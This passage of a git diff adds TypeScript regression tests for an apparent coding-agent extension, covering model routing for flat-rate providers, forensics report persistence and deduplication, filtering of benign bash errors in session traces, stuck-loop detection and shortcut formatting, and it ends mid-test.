+/**
+ * Regression test for #3453: dynamic model routing must be disabled for
+ * flat-rate providers like GitHub Copilot where all models cost the same
+ * per request — routing only degrades quality with no cost benefit.
+ */
+
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
+import { isFlatRateProvider, resolvePreferredModelConfig } from "../auto-model-selection.ts";
+
+describe("flat-rate provider routing guard (#3453)", () => {
+
+  test("isFlatRateProvider returns true for github-copilot", () => {
+    assert.equal(isFlatRateProvider("github-copilot"), true);
+  });
+
+  test("isFlatRateProvider returns true for copilot alias", () => {
+    assert.equal(isFlatRateProvider("copilot"), true);
+  });
+
+  test("isFlatRateProvider is case-insensitive", () => {
+    assert.equal(isFlatRateProvider("GitHub-Copilot"), true);
+    assert.equal(isFlatRateProvider("GITHUB-COPILOT"), true);
+    assert.equal(isFlatRateProvider("Copilot"), true);
+  });
+
+  test("isFlatRateProvider returns false for anthropic", () => {
+    assert.equal(isFlatRateProvider("anthropic"), false);
+  });
+
+  test("isFlatRateProvider returns false for openai", () => {
+    assert.equal(isFlatRateProvider("openai"), false);
+  });
+
+  test("resolvePreferredModelConfig returns undefined for copilot start model", () => {
+    // When the user's start model is on a flat-rate provider,
+    // resolvePreferredModelConfig should not synthesize a routing
+    // config from tier_models — it should return undefined so the
+    // user's selected model is preserved.
+    const result = resolvePreferredModelConfig("execute-task", {
+      provider: "github-copilot",
+      id: "claude-sonnet-4",
+    });
+
+    // Should be undefined (no routing config created for flat-rate)
+    // Note: this only tests the guard — if explicit per-unit config exists
+    // in preferences, that takes precedence regardless.
+    assert.equal(result, undefined, "Should not create routing config for copilot");
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/forensics-context-persist.test.ts b/src/resources/extensions/gsd/tests/forensics-context-persist.test.ts
new file mode 100644
index 000000000..ab6cf91e8
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/forensics-context-persist.test.ts
@@ -0,0 +1,129 @@
+import { describe, it, beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import { existsSync, mkdirSync, readFileSync, rmSync, writeFileSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { fileURLToPath } from "node:url";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+const gsdDir = join(__dirname, "..");
+
+/**
+ * Test suite for #2941: Forensics report context lost on follow-up turns.
+ *
+ * The forensics flow sends a one-shot message via sendMessage() with
+ * triggerTurn: true. On follow-up turns, the context is gone because
+ * there's no re-injection mechanism like buildGuidedExecuteContextInjection
+ * provides for task execution.
+ *
+ * Fix: write an active-forensics.json marker when forensics starts, and
+ * have buildBeforeAgentStartResult() re-inject the forensics prompt on
+ * subsequent turns.
+ */
+
+describe("forensics context persistence (#2941)", () => {
+  // ─── Source-level invariant tests ──────────────────────────────────────────
+
+  it("forensics.ts writes active-forensics marker after saving report", () => {
+    const src = readFileSync(join(gsdDir, "forensics.ts"), "utf-8");
+    assert.ok(
+      src.includes("active-forensics.json"),
+      "forensics.ts must reference active-forensics.json marker file",
+    );
+    assert.ok(
+      src.includes("writeForensicsMarker"),
+      "forensics.ts must call writeForensicsMarker to persist session state",
+    );
+  });
+
+  it("system-context.ts checks for active forensics marker in buildBeforeAgentStartResult", () => {
+    const src = readFileSync(join(gsdDir, "bootstrap", "system-context.ts"), "utf-8");
+    assert.ok(
+      src.includes("active-forensics.json"),
+      "system-context.ts must check for active-forensics.json marker",
+    );
+    assert.ok(
+      src.includes("gsd-forensics"),
+      "system-context.ts must inject gsd-forensics customType message",
+    );
+  });
+
+  it("system-context.ts exports clearForensicsMarker for cleanup", () => {
+    const src = readFileSync(join(gsdDir, "bootstrap", "system-context.ts"), "utf-8");
+    assert.ok(
+      src.includes("clearForensicsMarker"),
+      "system-context.ts must export clearForensicsMarker function",
+    );
+  });
+
+  // ─── Functional tests using temp directories ──────────────────────────────
+
+  const tmpBase = join(__dirname, "__tmp_forensics_persist__");
+
+  beforeEach(() => {
+    rmSync(tmpBase, { recursive: true, force: true });
+    mkdirSync(join(tmpBase, ".gsd", "runtime"), { recursive: true });
+    mkdirSync(join(tmpBase, ".gsd", "forensics"), { recursive: true });
+  });
+
+  afterEach(() => {
+    rmSync(tmpBase, { recursive: true, force: true });
+  });
+
+  it("writeForensicsMarker creates marker with reportPath and promptContent", async () => {
+    const { writeForensicsMarker } = await import("../forensics.ts");
+
+    const reportPath = join(tmpBase, ".gsd", "forensics", "report-2026-01-01.md");
+    writeFileSync(reportPath, "# Test Report", "utf-8");
+
+    writeForensicsMarker(tmpBase, reportPath, "Test forensics prompt content");
+
+    const markerPath = join(tmpBase, ".gsd", "runtime", "active-forensics.json");
+    assert.ok(existsSync(markerPath), "marker file must be created");
+
+    const marker = JSON.parse(readFileSync(markerPath, "utf-8"));
+    assert.equal(marker.reportPath, reportPath);
+    assert.equal(marker.promptContent, "Test forensics prompt content");
+    assert.ok(marker.createdAt, "marker must have createdAt timestamp");
+  });
+
+  it("readForensicsMarker returns null when no marker exists", async () => {
+    const { readForensicsMarker } = await import("../forensics.ts");
+
+    const result = readForensicsMarker(join(tmpBase, "nonexistent"));
+    assert.equal(result, null);
+  });
+
+  it("readForensicsMarker returns marker data when file exists", async () => {
+    const { readForensicsMarker } = await import("../forensics.ts");
+
+    const markerPath = join(tmpBase, ".gsd", "runtime", "active-forensics.json");
+    const markerData = {
+      reportPath: "/some/report.md",
+      promptContent: "forensics prompt",
+      createdAt: new Date().toISOString(),
+    };
+    writeFileSync(markerPath, JSON.stringify(markerData), "utf-8");
+
+    const result = readForensicsMarker(tmpBase);
+    assert.ok(result);
+    assert.equal(result.reportPath, "/some/report.md");
+    assert.equal(result.promptContent, "forensics prompt");
+  });
+
+  it("clearForensicsMarker removes the marker file", async () => {
+    const { clearForensicsMarker } = await import("../bootstrap/system-context.ts");
+
+    const markerPath = join(tmpBase, ".gsd", "runtime", "active-forensics.json");
+    writeFileSync(markerPath, JSON.stringify({ reportPath: "/x", promptContent: "y", createdAt: new Date().toISOString() }), "utf-8");
+    assert.ok(existsSync(markerPath), "precondition: marker must exist");
+
+    clearForensicsMarker(tmpBase);
+    assert.ok(!existsSync(markerPath), "marker must be removed after clear");
+  });
+
+  it("clearForensicsMarker is a no-op when no marker exists", async () => {
+    const { clearForensicsMarker } = await import("../bootstrap/system-context.ts");
+    // Should not throw
+    clearForensicsMarker(join(tmpBase, "nonexistent"));
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/forensics-db-completion.test.ts b/src/resources/extensions/gsd/tests/forensics-db-completion.test.ts
new file mode 100644
index 000000000..12fcf0bfc
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/forensics-db-completion.test.ts
@@ -0,0 +1,96 @@
+import { describe, it } from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { fileURLToPath } from "node:url";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+const gsdDir = join(__dirname, "..");
+
+/**
+ * Tests for #3129: forensics reads DB for completion status instead of legacy file.
+ *
+ * The old loadCompletedKeys() reads completed-units.json which is never populated
+ * during normal auto-mode completion. The DB (milestones/slices/tasks tables) is
+ * the authoritative source for completion status.
+ */
+describe("forensics DB completion status (#3129)", () => {
+  const forensicsSrc = readFileSync(join(gsdDir, "forensics.ts"), "utf-8");
+  const stateSrc = readFileSync(join(gsdDir, "state.ts"), "utf-8");
+
+  // ── Primary fix: forensics queries DB for completion counts ──────────
+
+  it("ForensicReport has dbCompletionCounts field for DB-sourced completion data", () => {
+    assert.ok(
+      forensicsSrc.includes("dbCompletionCounts"),
+      "ForensicReport must include dbCompletionCounts field for DB-sourced completion data",
+    );
+  });
+
+  it("buildForensicReport queries DB for completed milestones, slices, and tasks", () => {
+    assert.ok(
+      forensicsSrc.includes("getDbCompletionCounts"),
+      "buildForensicReport must call getDbCompletionCounts to query DB completion status",
+    );
+  });
+
+  it("getDbCompletionCounts checks isDbAvailable before querying", () => {
+    assert.ok(
+      forensicsSrc.includes("isDbAvailable"),
+      "getDbCompletionCounts must check isDbAvailable() before querying the DB",
+    );
+  });
+
+  it("getDbCompletionCounts queries getAllMilestones for milestone completion", () => {
+    assert.ok(
+      forensicsSrc.includes("getAllMilestones"),
+      "getDbCompletionCounts must use getAllMilestones() to count completed milestones",
+    );
+  });
+
+  it("completion counting uses isClosedStatus for consistent status checks", () => {
+    assert.ok(
+      forensicsSrc.includes("isClosedStatus"),
+      "forensics must use isClosedStatus() for consistent status checks",
+    );
+  });
+
+  it("report rendering shows DB completion counts instead of just legacy key count", () => {
+    assert.ok(
+      forensicsSrc.includes("milestones complete"),
+      "report must show '__ milestones complete' from DB data",
+    );
+    assert.ok(
+      forensicsSrc.includes("slices complete"),
+      "report must show '__ slices complete' from DB data",
+    );
+    assert.ok(
+      forensicsSrc.includes("tasks complete"),
+      "report must show '__ tasks complete' from DB data",
+    );
+  });
+
+  it("falls back to completed-units.json only when DB is unavailable", () => {
+    // loadCompletedKeys should still exist as fallback
+    assert.ok(
+      forensicsSrc.includes("loadCompletedKeys"),
+      "loadCompletedKeys must still exist as fallback for non-DB projects",
+    );
+    // But the report should prefer DB counts
+    assert.ok(
+      forensicsSrc.includes("dbCompletionCounts"),
+      "report must prefer dbCompletionCounts over legacy completedKeys",
+    );
+  });
+
+  // ── Secondary fix: STATE.md label when all milestones complete ───────
+
+  it("state.ts returns null activeMilestone when all milestones are complete", () => {
+    // When phase is "complete", activeMilestone should be null, not the last milestone
+    // The last completed milestone should be in a separate field
+    assert.ok(
+      stateSrc.includes("lastCompletedMilestone"),
+      "GSDState must have lastCompletedMilestone field for the final milestone when phase=complete",
+    );
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/forensics-dedup.test.ts b/src/resources/extensions/gsd/tests/forensics-dedup.test.ts
new file mode 100644
index 000000000..d407aa328
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/forensics-dedup.test.ts
@@ -0,0 +1,79 @@
+import { describe, it } from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { fileURLToPath } from "node:url";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+const gsdDir = join(__dirname, "..");
+
+describe("forensics dedup (#2096)", () => {
+  it("forensics_dedup is in KNOWN_PREFERENCE_KEYS", () => {
+    const source = readFileSync(join(gsdDir, "preferences-types.ts"), "utf-8");
+    assert.ok(source.includes('"forensics_dedup"'),
+      "KNOWN_PREFERENCE_KEYS must contain forensics_dedup");
+    assert.ok(source.includes("forensics_dedup?: boolean"),
+      "GSDPreferences must declare forensics_dedup as optional boolean");
+  });
+
+  it("forensics prompt contains {{dedupSection}} placeholder", () => {
+    const prompt = readFileSync(join(gsdDir, "prompts", "forensics.md"), "utf-8");
+    assert.ok(prompt.includes("{{dedupSection}}"),
+      "forensics.md must contain {{dedupSection}} placeholder");
+  });
+
+  it("DEDUP_PROMPT_SECTION contains required search commands", async () => {
+    const source = readFileSync(join(gsdDir, "forensics.ts"), "utf-8");
+    assert.ok(source.includes("DEDUP_PROMPT_SECTION"), "forensics.ts must define DEDUP_PROMPT_SECTION");
+    assert.ok(source.includes("gh issue list --repo gsd-build/gsd-2 --state closed"));
+    assert.ok(source.includes("gh pr list --repo gsd-build/gsd-2 --state open"));
+    assert.ok(source.includes("gh pr list --repo gsd-build/gsd-2 --state merged"));
+  });
+
+  it("handleForensics checks forensics_dedup preference", () => {
+    const source = readFileSync(join(gsdDir, "forensics.ts"), "utf-8");
+    assert.ok(source.includes("forensics_dedup"),
+      "handleForensics must reference forensics_dedup preference");
+    assert.ok(source.includes("dedupSection"),
+      "handleForensics must pass dedupSection to loadPrompt");
+  });
+
+  it("first-time opt-in shows when preference is undefined", () => {
+    const source = readFileSync(join(gsdDir, "forensics.ts"), "utf-8");
+    assert.ok(source.includes("=== undefined"),
+      "first-time detection must check for undefined (not false)");
+    assert.ok(source.includes("Duplicate detection available") || source.includes("duplicate detection"),
+      "opt-in notice must mention duplicate detection");
+  });
+});
+
+describe("forensics dedup ordering (#2704)", () => {
+  it("{{dedupSection}} appears before Investigation Protocol in the prompt template", () => {
+    const prompt = readFileSync(join(gsdDir, "prompts", "forensics.md"), "utf-8");
+    const dedupIndex = prompt.indexOf("{{dedupSection}}");
+    const investigationIndex = prompt.indexOf("## Investigation Protocol");
+    assert.ok(dedupIndex !== -1, "prompt must contain {{dedupSection}}");
+    assert.ok(investigationIndex !== -1, "prompt must contain ## Investigation Protocol");
+    assert.ok(
+      dedupIndex < investigationIndex,
+      `{{dedupSection}} (index ${dedupIndex}) must appear before Investigation Protocol (index ${investigationIndex}) — dedup should run before expensive investigation to avoid wasting tokens on already-fixed bugs`,
+    );
+  });
+
+  it("DEDUP_PROMPT_SECTION contains a decision gate to skip investigation", () => {
+    const source = readFileSync(join(gsdDir, "forensics.ts"), "utf-8");
+    // The dedup section must instruct the agent to skip investigation when a match is found
+    assert.ok(
+      source.includes("Skip full investigation") || source.includes("skip full investigation") || source.includes("Skip investigation"),
+      "DEDUP_PROMPT_SECTION must contain a decision gate telling the agent to skip full investigation when a duplicate is found",
+    );
+  });
+
+  it("DEDUP_PROMPT_SECTION heading reflects pre-investigation role", () => {
+    const source = readFileSync(join(gsdDir, "forensics.ts"), "utf-8");
+    assert.ok(
+      source.includes("Pre-Investigation") || source.includes("pre-investigation"),
+      "DEDUP_PROMPT_SECTION heading must indicate it runs before investigation, not just before issue creation",
+    );
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/forensics-error-filter.test.ts b/src/resources/extensions/gsd/tests/forensics-error-filter.test.ts
new file mode 100644
index 000000000..9575e729f
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/forensics-error-filter.test.ts
@@ -0,0 +1,121 @@
+/**
+ * Regression test for #2539: extractTrace should not count benign bash
+ * exit-code-1 (grep no-match) or user skips as errors.
+ */
+import { describe, test } from "node:test";
+import assert from "node:assert/strict";
+
+import { extractTrace } from "../session-forensics.ts";
+
+/**
+ * Build a minimal JSONL entry pair: assistant tool_use → toolResult.
+ * This is the shape extractTrace() expects from session activity files.
+ */
+function makeToolPair(
+  toolName: string,
+  input: Record<string, unknown>,
+  resultText: string,
+  isError: boolean,
+): unknown[] {
+  const toolCallId = `toolu_${Math.random().toString(36).slice(2, 10)}`;
+  return [
+    {
+      type: "message",
+      message: {
+        role: "assistant",
+        content: [
+          {
+            type: "toolCall",
+            id: toolCallId,
+            name: toolName,
+            arguments: input,
+          },
+        ],
+      },
+    },
+    {
+      type: "message",
+      message: {
+        role: "toolResult",
+        toolCallId,
+        toolName,
+        isError,
+        content: [{ type: "text", text: resultText }],
+      },
+    },
+  ];
+}
+
+describe("extractTrace error filtering (#2539)", () => {
+  test("grep exit-code-1 (no matches) is not counted as an error", () => {
+    const entries = makeToolPair(
+      "bash",
+      { command: "grep -rn 'nonexistent' src/" },
+      "(no output)\nCommand exited with code 1",
+      true,
+    );
+    const trace = extractTrace(entries);
+    assert.equal(trace.errors.length, 0, "grep no-match should not be an error");
+  });
+
+  test("user skip is not counted as an error", () => {
+    const entries = makeToolPair(
+      "bash",
+      { command: "npm run test" },
+      "Skipped due to queued user message",
+      true,
+    );
+    const trace = extractTrace(entries);
+    assert.equal(trace.errors.length, 0, "user skip should not be an error");
+  });
+
+  test("real bash error is still counted", () => {
+    const entries = makeToolPair(
+      "bash",
+      { command: "cat /nonexistent" },
+      "cat: /nonexistent: No such file or directory\nCommand exited with code 1",
+      true,
+    );
+    const trace = extractTrace(entries);
+    assert.equal(trace.errors.length, 1, "real error should still be counted");
+    assert.match(trace.errors[0], /No such file or directory/);
+  });
+
+  test("non-bash tool error is still counted", () => {
+    const entries = makeToolPair(
+      "edit",
+      { path: "foo.ts", oldText: "x", newText: "y" },
+      "oldText not found in file",
+      true,
+    );
+    const trace = extractTrace(entries);
+    assert.equal(trace.errors.length, 1, "non-bash tool errors should still be counted");
+  });
+
+  test("mixed entries: only real errors are counted", () => {
+    const entries = [
+      // benign grep no-match
+      ...makeToolPair("bash", { command: "grep -rn 'pattern' src/" }, "(no output)\nCommand exited with code 1", true),
+      // user skip
+      ...makeToolPair("bash", { command: "npm test" }, "Skipped due to queued user message", true),
+      // real error
+      ...makeToolPair("bash", { command: "node broken.js" }, "SyntaxError: Unexpected token\nCommand exited with code 1", true),
+      // successful command (not an error)
+      ...makeToolPair("bash", { command: "echo hello" }, "hello", false),
+    ];
+    const trace = extractTrace(entries);
+    assert.equal(trace.errors.length, 1, "only the real error should be counted");
+    assert.match(trace.errors[0], /SyntaxError/);
+  });
+
+  test("exit code 1 with actual output is still an error", () => {
+    const entries = makeToolPair(
+      "bash",
+      { command: "npm run lint" },
+      "src/foo.ts:10:5 - error TS2304: Cannot find name 'x'\nCommand exited with code 1",
+      true,
+    );
+    const trace = extractTrace(entries);
+    assert.equal(trace.errors.length, 1, "lint error with output should be counted");
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/forensics-issue-routing.test.ts b/src/resources/extensions/gsd/tests/forensics-issue-routing.test.ts
new file mode 100644
index 000000000..d4154ba98
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/forensics-issue-routing.test.ts
@@ -0,0 +1,43 @@
+import test from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join } from "node:path";
+
+const promptsDir = join(process.cwd(), "src/resources/extensions/gsd/prompts");
+
+function readPrompt(name: string): string {
+  return readFileSync(join(promptsDir, `${name}.md`), "utf-8");
+}
+
+test("forensics prompt explicitly forbids github_issues tool for issue creation", () => {
+  const prompt = readPrompt("forensics");
+
+  // Must contain an explicit prohibition against using the github_issues tool
+  assert.match(
+    prompt,
+    /Do NOT use the `?github_issues`? tool/i,
+    "Prompt must explicitly prohibit the github_issues tool",
+  );
+});
+
+test("forensics prompt requires gh CLI with --repo gsd-build/gsd-2 for issue creation", () => {
+  const prompt = readPrompt("forensics");
+
+  // Must contain the exact gh CLI command with the correct repo flag
+  assert.match(
+    prompt,
+    /gh issue create --repo gsd-build\/gsd-2/,
+    "Prompt must specify gh issue create --repo gsd-build/gsd-2",
+  );
+});
+
+test("forensics prompt routes issue creation through bash tool, not github_issues", () => {
+  const prompt = readPrompt("forensics");
+
+  // The constraint about using bash tool must be present
+  assert.match(
+    prompt,
+    /`?bash`? tool/i,
+    "Prompt must instruct use of the bash tool for issue creation",
+  );
+});
diff --git a/src/resources/extensions/gsd/tests/forensics-journal.test.ts b/src/resources/extensions/gsd/tests/forensics-journal.test.ts
new file mode 100644
index 000000000..ead29c00a
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/forensics-journal.test.ts
@@ -0,0 +1,162 @@
+import { describe, it } from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { fileURLToPath } from "node:url";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+const gsdDir = join(__dirname, "..");
+
+describe("forensics journal & activity log awareness", () => {
+  const forensicsSrc = readFileSync(join(gsdDir, "forensics.ts"), "utf-8");
+  const promptSrc = readFileSync(join(gsdDir, "prompts", "forensics.md"), "utf-8");
+
+  it("scanJournalForForensics reads journal files directly (no full queryJournal load)", () => {
+    // Must NOT use queryJournal which loads ALL entries into memory
+    assert.ok(
+      !forensicsSrc.includes('queryJournal('),
+      "forensics.ts must NOT call queryJournal() which loads all entries at once",
+    );
+    // Must have its own journal scanning with file-level limits
+    assert.ok(
+      forensicsSrc.includes("scanJournalForForensics"),
+      "forensics.ts must have scanJournalForForensics function",
+    );
+  });
+
+  it("journal scanning limits files parsed to avoid memory bloat", () => {
+    assert.ok(
+      forensicsSrc.includes("MAX_JOURNAL_RECENT_FILES"),
+      "must have MAX_JOURNAL_RECENT_FILES constant to limit parsed files",
+    );
+    assert.ok(
+      forensicsSrc.includes("MAX_JOURNAL_RECENT_EVENTS"),
+      "must have MAX_JOURNAL_RECENT_EVENTS constant to limit events extracted",
+    );
+  });
+
+  it("older journal files are line-counted without full JSON parse", () => {
+    assert.ok(
+      forensicsSrc.includes("olderEntryCount") || forensicsSrc.includes("olderFiles"),
+      "must handle older files separately from recent files",
+    );
+  });
+
+  it("ForensicReport includes journalSummary field", () => {
+    assert.ok(
+      forensicsSrc.includes("journalSummary"),
+      "ForensicReport must include journalSummary field",
+    );
+  });
+
+  it("ForensicReport includes activityLogMeta field", () => {
+    assert.ok(
+      forensicsSrc.includes("activityLogMeta"),
+      "ForensicReport must include activityLogMeta field",
+    );
+  });
+
+  it("buildForensicReport calls scanJournalForForensics", () => {
+    assert.ok(
+      forensicsSrc.includes("scanJournalForForensics"),
+      "buildForensicReport must call scanJournalForForensics",
+    );
+  });
+
+  it("buildForensicReport calls gatherActivityLogMeta", () => {
+    assert.ok(
+      forensicsSrc.includes("gatherActivityLogMeta"),
+      "buildForensicReport must call gatherActivityLogMeta",
+    );
+  });
+
+  it("forensics detects journal-based anomalies", () => {
+    assert.ok(
+      forensicsSrc.includes("detectJournalAnomalies"),
+      "forensics.ts must have detectJournalAnomalies function",
+    );
+    // Check for specific journal anomaly types
+    assert.ok(forensicsSrc.includes('"journal-stuck"'), "must detect journal-stuck anomalies");
+    assert.ok(forensicsSrc.includes('"journal-guard-block"'), "must detect journal-guard-block anomalies");
+    assert.ok(forensicsSrc.includes('"journal-rapid-iterations"'), "must detect journal-rapid-iterations anomalies");
+    assert.ok(forensicsSrc.includes('"journal-worktree-failure"'), "must detect journal-worktree-failure anomalies");
+  });
+
+  it("formatReportForPrompt includes journal summary section", () => {
+    assert.ok(
+      forensicsSrc.includes("Journal Summary"),
+      "prompt formatter must include a Journal Summary section",
+    );
+  });
+
+  it("formatReportForPrompt includes activity log overview section", () => {
+    assert.ok(
+      forensicsSrc.includes("Activity Log Overview"),
+      "prompt formatter must include an Activity Log Overview section",
+    );
+  });
+
+  it("activity log scanning uses tail-read with byte cap (not full file load)", () => {
+    // scanActivityLogs uses nativeParseJsonlTail + MAX_JSONL_BYTES for efficient reading
+    assert.ok(
+      forensicsSrc.includes("nativeParseJsonlTail"),
+      "activity log scanning must use nativeParseJsonlTail for tail-reading",
+    );
+    assert.ok(
+      forensicsSrc.includes("MAX_JSONL_BYTES"),
+      "activity log scanning must respect MAX_JSONL_BYTES cap",
+    );
+    // Only reads last 5 files
+    assert.ok(
+      forensicsSrc.includes("slice(-5)"),
+      "activity log scanning must limit to last 5 files",
+    );
+  });
+
+  it("activity log entries are distilled through extractTrace, not sent raw", () => {
+    assert.ok(
+      forensicsSrc.includes("extractTrace("),
+      "activity log entries must be distilled through extractTrace before reporting",
+    );
+  });
+
+  it("prompt output is hard-capped at 30KB", () => {
+    assert.ok(
+      forensicsSrc.includes("MAX_BYTES") && forensicsSrc.includes("30 * 1024"),
+      "formatReportForPrompt must have a 30KB hard cap",
+    );
+    assert.ok(
+      forensicsSrc.includes("truncated at 30KB"),
+      "prompt must show truncation message when capped",
+    );
+  });
+
+  it("forensics prompt documents journal format", () => {
+    assert.ok(
+      promptSrc.includes("### Journal Format"),
+      "forensics.md must document the journal format",
+    );
+    assert.ok(
+      promptSrc.includes("flowId"),
+      "forensics.md must reference flowId concept",
+    );
+    assert.ok(
+      promptSrc.includes("causedBy"),
+      "forensics.md must reference causedBy for causal chains",
+    );
+  });
+
+  it("forensics prompt includes journal directory in runtime path reference", () => {
+    assert.ok(
+      promptSrc.includes("journal/"),
+      "forensics.md runtime path reference must include journal/",
+    );
+  });
+
+  it("investigation protocol references journal data", () => {
+    assert.ok(
+      promptSrc.includes("journal timeline") || promptSrc.includes("journal events"),
+      "investigation protocol must reference journal data for tracing",
+    );
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/forensics-stuck-loops.test.ts b/src/resources/extensions/gsd/tests/forensics-stuck-loops.test.ts
new file mode 100644
index 000000000..555570bab
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/forensics-stuck-loops.test.ts
@@ -0,0 +1,103 @@
+/**
+ * Forensics detectStuckLoops tests — #1943
+ *
+ * Verifies that detectStuckLoops counts distinct dispatches (unique startedAt
+ * values per type/id) instead of raw entry count, which produces false-positive
+ * stuck-loop anomalies when idle-watchdog duplicate metrics entries exist.
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import type { UnitMetrics } from "../metrics.js";
+import { detectStuckLoops, type ForensicAnomaly } from "../forensics.js";
+
+// ── Helpers ──────────────────────────────────────────────────────────────────
+
+function makeUnit(overrides: Partial<UnitMetrics> = {}): UnitMetrics {
+  return {
+    type: "execute-task",
+    id: "M001/S01/T01",
+    model: "claude-sonnet-4-20250514",
+    startedAt: 1000,
+    finishedAt: 2000,
+    tokens: { input: 1000, output: 500, cacheRead: 200, cacheWrite: 100, total: 1800 },
+    cost: 0.05,
+    toolCalls: 3,
+    assistantMessages: 2,
+    userMessages: 1,
+    ...overrides,
+  };
+}
+
+
+// ── Tests ────────────────────────────────────────────────────────────────────
+
+test("#1943 detectStuckLoops does not flag idle-watchdog duplicates as stuck loops", () => {
+  const anomalies: ForensicAnomaly[] = [];
+  const startedAt = 1774011016218;
+
+  // 20 entries with the SAME startedAt — these are idle-watchdog duplicates,
+  // not real re-dispatches. They should count as 1 dispatch.
+  const units: UnitMetrics[] = [];
+  for (let i = 0; i < 20; i++) {
+    units.push(makeUnit({
+      type: "research-slice",
+      id: "M009/S02",
+      startedAt,
+      finishedAt: startedAt + (i + 1) * 15000,
+      cost: 1.50 + i * 0.05,
+      toolCalls: 0,
+    }));
+  }
+
+  detectStuckLoops(units, anomalies);
+
+  // A single dispatch (same startedAt) should NOT trigger a stuck-loop anomaly
+  assert.equal(
+    anomalies.length, 0,
+    `expected 0 anomalies for 20 watchdog snapshots of the same dispatch, got ${anomalies.length}: ${anomalies.map(a => a.summary).join(", ")}`,
+  );
+});
+
+test("#1943 detectStuckLoops correctly flags real re-dispatches", () => {
+  const anomalies: ForensicAnomaly[] = [];
+
+  // 3 entries with DIFFERENT startedAt values — these are real re-dispatches
+  const units: UnitMetrics[] = [
+    makeUnit({ type: "execute-task", id: "M001/S01/T01", startedAt: 1000, finishedAt: 2000, cost: 0.05 }),
+    makeUnit({ type: "execute-task", id: "M001/S01/T01", startedAt: 3000, finishedAt: 4000, cost: 0.06 }),
+    makeUnit({ type: "execute-task", id: "M001/S01/T01", startedAt: 5000, finishedAt: 6000, cost: 0.07 }),
+  ];
+
+  detectStuckLoops(units, anomalies);
+
+  assert.equal(anomalies.length, 1, "3 distinct dispatches of the same unit should flag 1 anomaly");
+  assert.equal(anomalies[0].type, "stuck-loop");
+  assert.ok(anomalies[0].summary.includes("3 times"), `summary should mention 3 dispatches: ${anomalies[0].summary}`);
+});
+
+test("#1943 detectStuckLoops ignores watchdog duplicates but flags real re-dispatches in mixed data", () => {
+  const anomalies: ForensicAnomaly[] = [];
+
+  const units: UnitMetrics[] = [
+    // 5 watchdog duplicates for dispatch 1 (same startedAt = 1000)
+    ...Array.from({ length: 5 }, (_, i) =>
+      makeUnit({ type: "execute-task", id: "M001/S01/T01", startedAt: 1000, finishedAt: 1000 + (i + 1) * 15000, cost: 0.05 + i * 0.01 }),
+    ),
+    // 3 watchdog duplicates for dispatch 2 (same startedAt = 100000)
+    ...Array.from({ length: 3 }, (_, i) =>
+      makeUnit({ type: "execute-task", id: "M001/S01/T01", startedAt: 100000, finishedAt: 100000 + (i + 1) * 15000, cost: 0.08 + i * 0.01 }),
+    ),
+    // 1 entry for dispatch 3 (startedAt = 200000)
+    makeUnit({ type: "execute-task", id: "M001/S01/T01", startedAt: 200000, finishedAt: 260000, cost: 0.10 }),
+    // Different unit — only 1 dispatch, should NOT be flagged
+    makeUnit({ type: "plan-slice", id: "M001/S01", startedAt: 500, finishedAt: 1500, cost: 0.02 }),
+  ];
+
+  detectStuckLoops(units, anomalies);
+
+  // M001/S01/T01 has 3 distinct dispatches (startedAt: 1000, 100000, 200000) — should be flagged
+  // M001/S01 has 1 dispatch — should NOT be flagged
+  assert.equal(anomalies.length, 1, `expected 1 anomaly (for the 3x dispatched task), got ${anomalies.length}`);
+  assert.ok(anomalies[0].summary.includes("3 times"));
+});
diff --git a/src/resources/extensions/gsd/tests/format-shortcut.test.ts b/src/resources/extensions/gsd/tests/format-shortcut.test.ts
new file mode 100644
index 000000000..b6c90e4b1
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/format-shortcut.test.ts
@@ -0,0 +1,69 @@
+// GSD Extension — formatShortcut tests
+// Verifies OS-specific keyboard shortcut rendering.
+
+import test from 'node:test';
+import assert from 'node:assert/strict';
+import { formatShortcut } from '../files.ts';
+
+// ─── formatShortcut renders per-platform shortcuts ──────────────────────
+
+test('formatShortcut: converts Ctrl+Alt combo on macOS', () => {
+  // formatShortcut uses process.platform at module load time.
+  // We can only test the current platform's behavior.
+  const result = formatShortcut('Ctrl+Alt+G');
+  if (process.platform === 'darwin') {
+    assert.strictEqual(result, '⌃⌥G', 'macOS should use ⌃⌥ symbols');
+  } else {
+    assert.strictEqual(result, 'Ctrl+Alt+G', 'non-macOS should pass through unchanged');
+  }
+});
+
+test('formatShortcut: converts Ctrl+Alt+N', () => {
+  const result = formatShortcut('Ctrl+Alt+N');
+  if (process.platform === 'darwin') {
+    assert.strictEqual(result, '⌃⌥N');
+  } else {
+    assert.strictEqual(result, 'Ctrl+Alt+N');
+  }
+});
+
+test('formatShortcut: converts Ctrl+Alt+B', () => {
+  const result = formatShortcut('Ctrl+Alt+B');
+  if (process.platform === 'darwin') {
+    assert.strictEqual(result, '⌃⌥B');
+  } else {
+    assert.strictEqual(result, 'Ctrl+Alt+B');
+  }
+});
+
+test('formatShortcut: converts standalone Ctrl modifier', () => {
+  const result = formatShortcut('Ctrl+C');
+  if (process.platform === 'darwin') {
